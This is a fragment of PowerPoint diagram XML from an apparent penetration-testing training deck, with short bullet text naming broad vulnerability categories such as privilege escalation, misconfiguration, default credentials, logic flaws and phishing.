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87" r:id="rId2"/>
    <p:sldId id="272" r:id="rId3"/>
    <p:sldId id="271" r:id="rId4"/>
    <p:sldId id="267" r:id="rId5"/>
    <p:sldId id="256" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="288" r:id="rId9"/>
    <p:sldId id="284" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="285" r:id="rId12"/>
    <p:sldId id="286" r:id="rId13"/>
    <p:sldId id="294" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="297" r:id="rId16"/>
    <p:sldId id="298" r:id="rId17"/>
    <p:sldId id="296" r:id="rId18"/>
    <p:sldId id="289" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="291" r:id="rId21"/>
    <p:sldId id="292" r:id="rId22"/>
    <p:sldId id="293" r:id="rId23"/>
    <p:sldId id="304" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="306" r:id="rId26"/>
    <p:sldId id="307" r:id="rId27"/>
    <p:sldId id="315" r:id="rId28"/>
    <p:sldId id="257" r:id="rId29"/>
    <p:sldId id="258" r:id="rId30"/>
    <p:sldId id="259" r:id="rId31"/>
    <p:sldId id="260" r:id="rId32"/>
    <p:sldId id="261" r:id="rId33"/>
    <p:sldId id="262" r:id="rId34"/>
    <p:sldId id="263" r:id="rId35"/>
    <p:sldId id="264" r:id="rId36"/>
    <p:sldId id="265" r:id="rId37"/>
    <p:sldId id="310" r:id="rId38"/>
    <p:sldId id="311" r:id="rId39"/>
    <p:sldId id="312" r:id="rId40"/>
    <p:sldId id="313" r:id="rId41"/>
    <p:sldId id="302" r:id="rId42"/>
    <p:sldId id="299" r:id="rId43"/>
    <p:sldId id="300" r:id="rId44"/>
    <p:sldId id="301" r:id="rId45"/>
    <p:sldId id="316" r:id="rId46"/>
    <p:sldId id="317" r:id="rId47"/>
    <p:sldId id="318" r:id="rId48"/>
    <p:sldId id="319" r:id="rId49"/>
    <p:sldId id="320" r:id="rId50"/>
    <p:sldId id="321" r:id="rId51"/>
    <p:sldId id="274" r:id="rId52"/>
    <p:sldId id="275" r:id="rId53"/>
    <p:sldId id="276" r:id="rId54"/>
    <p:sldId id="277" r:id="rId55"/>
    <p:sldId id="278" r:id="rId56"/>
    <p:sldId id="279" r:id="rId57"/>
    <p:sldId id="280" r:id="rId58"/>
    <p:sldId id="28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66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="90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24B8A-8829-4B78-A2B5-E5FD4C7989F9}"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9A01635F-8EF3-480F-86EA-2179D3F3B6CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Knowing about vulnerabilities is essential for penetration testers, as they will often exploit these to assess security during engagements.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D01FDBF0-DA30-4626-9F04-004C791A72CC}" type="parTrans" cxnId="{368DA20C-9289-41E0-A4E3-C754CB40BFBA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{038CF600-EDAC-44F6-A5F8-F1D7175DDECA}" type="sibTrans" cxnId="{368DA20C-9289-41E0-A4E3-C754CB40BFBA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3F616FE-EBFD-498B-B85B-4145B4F03418}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Vulnerabilities play a critical role in an organization's vulnerability management, where the goal is to identify, prioritize, and mitigate potential threats.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34E39A79-1E8A-4FBC-A6A4-DA5D3475D8A5}" type="parTrans" cxnId="{93951371-F947-4991-B6E8-58A0E11849D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71C60675-4F07-4137-A7F8-137801F5FD70}" type="sibTrans" cxnId="{93951371-F947-4991-B6E8-58A0E11849D2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" type="pres">
      <dgm:prSet presAssocID="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" presName="hierChild1" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="hierRoot1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42AFDF0B-6643-4627-9C4F-407B6B7004B0}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="background" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{62B8901D-01D5-442C-BBF3-ED6F538051F6}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="text" presStyleLbl="fgAcc0" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{94302866-C5D4-4219-B184-BE411308993C}" type="pres">
      <dgm:prSet presAssocID="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82F17434-496C-44FE-B108-87EFAB26346C}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="hierRoot1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{87A1B657-444F-437B-A7DB-2183CE8074A3}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="background" presStyleLbl="node0" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8407EFF4-6D45-4449-8017-216DD6B9DE61}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="text" presStyleLbl="fgAcc0" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05E16EBB-48EB-4EE9-94D5-868F605449E7}" type="pres">
      <dgm:prSet presAssocID="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{368DA20C-9289-41E0-A4E3-C754CB40BFBA}" srcId="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" destId="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" srcOrd="0" destOrd="0" parTransId="{D01FDBF0-DA30-4626-9F04-004C791A72CC}" sibTransId="{038CF600-EDAC-44F6-A5F8-F1D7175DDECA}"/>
    <dgm:cxn modelId="{93951371-F947-4991-B6E8-58A0E11849D2}" srcId="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" destId="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" srcOrd="1" destOrd="0" parTransId="{34E39A79-1E8A-4FBC-A6A4-DA5D3475D8A5}" sibTransId="{71C60675-4F07-4137-A7F8-137801F5FD70}"/>
    <dgm:cxn modelId="{3A2E8F78-0E01-4EDA-9859-C61CE854BBD4}" type="presOf" srcId="{43324B8A-8829-4B78-A2B5-E5FD4C7989F9}" destId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5F2967A4-020C-444C-A81F-504A0FA4BAD3}" type="presOf" srcId="{9A01635F-8EF3-480F-86EA-2179D3F3B6CE}" destId="{62B8901D-01D5-442C-BBF3-ED6F538051F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{918044F5-BA45-4CB6-A3F4-E5845E145C95}" type="presOf" srcId="{E3F616FE-EBFD-498B-B85B-4145B4F03418}" destId="{8407EFF4-6D45-4449-8017-216DD6B9DE61}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{CC854378-846D-4739-983F-0961F5C73720}" type="presParOf" srcId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" destId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{508215D5-FD3C-4A3F-B2E4-E407007DD76E}" type="presParOf" srcId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" destId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C68C0CAF-551C-401A-A2A0-528AF0D48831}" type="presParOf" srcId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" destId="{42AFDF0B-6643-4627-9C4F-407B6B7004B0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{ACC7FD87-7B8C-46FA-B9E4-2C920BA150BD}" type="presParOf" srcId="{9FA090B0-2552-4EA9-BF02-8F14EC272B73}" destId="{62B8901D-01D5-442C-BBF3-ED6F538051F6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{1984909B-ECD7-44E4-8948-79F827913B6E}" type="presParOf" srcId="{4339A601-9EDD-42D4-ACDE-89D68E42E8A8}" destId="{94302866-C5D4-4219-B184-BE411308993C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{85D64C0E-4E55-44D4-ACC6-D08B234EA4AB}" type="presParOf" srcId="{DB5D320B-3D51-4CC3-8B12-A358A3F46BE7}" destId="{82F17434-496C-44FE-B108-87EFAB26346C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{51E78552-ADE9-4488-B436-B1E9F18ABACC}" type="presParOf" srcId="{82F17434-496C-44FE-B108-87EFAB26346C}" destId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E96C6AB3-A5AE-4D69-8127-CA524B34AB57}" type="presParOf" srcId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" destId="{87A1B657-444F-437B-A7DB-2183CE8074A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F5359249-9F73-46D1-8B9C-0F64E958141D}" type="presParOf" srcId="{EB41F40C-5AC2-48FE-824D-9B09F689AA75}" destId="{8407EFF4-6D45-4449-8017-216DD6B9DE61}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{81111A32-69EA-4B2A-8B43-10D6556A8877}" type="presParOf" srcId="{82F17434-496C-44FE-B108-87EFAB26346C}" destId="{05E16EBB-48EB-4EE9-94D5-868F605449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71627A-9D07-4A86-B6CA-2A569AE89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0FF5AEC-6AB4-46E6-92B2-E08B0832A863}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Operating System Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Often lead to privilege escalation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0CF5661-B9ED-4938-B184-0E7B77BE5C78}" type="parTrans" cxnId="{564D6EA2-99D1-412B-BE6E-9C82BCE3C4F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{50EC5754-12EA-419A-A647-0DDDB4CBDA8D}" type="sibTrans" cxnId="{564D6EA2-99D1-412B-BE6E-9C82BCE3C4F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Misconfiguration-Based Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Result from incorrect configuration, such as exposing sensitive data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{861079B8-8F40-49E0-82C9-D8F18A352F46}" type="parTrans" cxnId="{49840CBD-A5E0-4CE3-B7E2-35A3E3646D44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{641A9597-63D7-41C8-8A4D-8944861B1C07}" type="sibTrans" cxnId="{49840CBD-A5E0-4CE3-B7E2-35A3E3646D44}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Weak or Default Credentials</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Easily guessable login credentials like “admin/admin.”</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{368CC7D7-0050-4850-8874-C312A241B8E0}" type="parTrans" cxnId="{B3E2D8B8-A35D-4230-84DB-C24FE57141B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0087A09B-9C93-44FC-83C5-DE83F12FCCDA}" type="sibTrans" cxnId="{B3E2D8B8-A35D-4230-84DB-C24FE57141B0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Application Logic Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Flaws in how an application operates, which can be exploited to bypass security.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0861AAEB-EE80-4274-AADD-BB77C1EB9A3A}" type="parTrans" cxnId="{41F88430-77D8-434F-BF66-67D481BBF62B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB6940B7-2E53-4CF8-886C-20E1AA3839EE}" type="sibTrans" cxnId="{41F88430-77D8-434F-BF66-67D481BBF62B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Human-Factor Vulnerabilities</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>: Attacks like phishing that exploit human behavio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>r</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7D68B5ED-1FCD-4B55-A901-2353028A007D}" type="parTrans" cxnId="{DA471BE0-98F5-4DDA-98CA-F665AFB7F515}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2812C36-BA53-47C8-AFCA-17A7EBCD664D}" type="sibTrans" cxnId="{DA471BE0-98F5-4DDA-98CA-F665AFB7F515}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3362D2C6-64F5-4516-8814-D8690869B54B}" type="pres">
      <dgm:prSet presAssocID="{A971627A-9D07-4A86-B6CA-2A569AE8943B}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB08C557-061F-47CB-AE7B-E30FC4F06B99}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39D6F6EC-D4B4-4EE3-9832-4387E440CBD6}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{85501616-B0C4-415D-B7AF-29F864105B68}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A86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25F6E171-D8C6-45BF-B665-B27C67F421AE}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{23E0191F-8FBF-4239-A8FA-9F4CD2D68705}" type="pres">
      <dgm:prSet presAssocID="{80FF5AEC-6AB4-46E6-92B2-E08B0832A863}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD950571-E2DA-410A-87D7-47609D624403}" type="pres">
      <dgm:prSet presAssocID="{50EC5754-12EA-419A-A647-0DDDB4CBDA8D}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BA3320C-ACCE-4B00-A74E-4AE4D1528BC3}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BC8816F6-C443-4C38-8B2D-1A4C58BA2F4E}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2D574396-6D6D-46A2-85D0-BD58C82E8386}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0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75FD4A7-37F2-41BC-82BC-38BB6DDD2658}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ACC1F707-86AA-48F1-AA87-5B77320F775C}" type="pres">
      <dgm:prSet presAssocID="{DB1E2A72-5574-48AF-98BA-142C771AE0E0}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C1F579D9-CE9E-4685-8817-D7DE50210E2F}" type="pres">
      <dgm:prSet presAssocID="{641A9597-63D7-41C8-8A4D-8944861B1C07}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5ACE4098-ADBE-4413-A4CB-75AE7EF4CA79}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C0041D5B-A451-4BE7-97ED-ECB827100573}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{806E1EAD-6482-4F32-BDAB-A2E0D9356CFF}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490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7476AFEB-422B-448D-A308-AB0E53A61139}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E2A52A9B-CCC7-496B-8D6B-8B0EAA4B3AD7}" type="pres">
      <dgm:prSet presAssocID="{2B0286D9-1EB0-4DA2-BAD7-5541ED2F490A}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4F6C7D1-3FCA-4646-9D25-3B437FCE4E80}" type="pres">
      <dgm:prSet presAssocID="{0087A09B-9C93-44FC-83C5-DE83F12FCCDA}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DFCC0951-D3C7-458E-B719-F674F12A1D55}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8429B3F8-0692-4580-AAAD-ACB10A105C3E}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C71A647-2598-4220-851B-58FCDFB51709}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920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85A1B60-0833-486A-99F5-66F4C5D15065}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5357FABA-4393-4E78-AC84-092FA64D5A16}" type="pres">
      <dgm:prSet presAssocID="{F2C5C1E2-2809-4C4E-8261-DB01A73920BF}" presName="parTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AFCCD979-5D27-42A9-8D82-2DB128037B34}" type="pres">
      <dgm:prSet presAssocID="{FB6940B7-2E53-4CF8-886C-20E1AA3839EE}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EB44108E-61D4-4B24-B07D-F049B5B6A53E}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92C6FA6F-4A29-442D-B552-CD287699C562}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{60CD19B2-7CF6-41F0-BDCF-8B3E74F85A38}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A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91E45695-7B91-4C88-9E60-B06D9A981D3B}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{076400EC-2719-40EB-94E6-DB42C7CE8C38}" type="pres">
      <dgm:prSet presAssocID="{BA8BD76D-8624-42AA-AD96-B6ECBCBD6A68}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
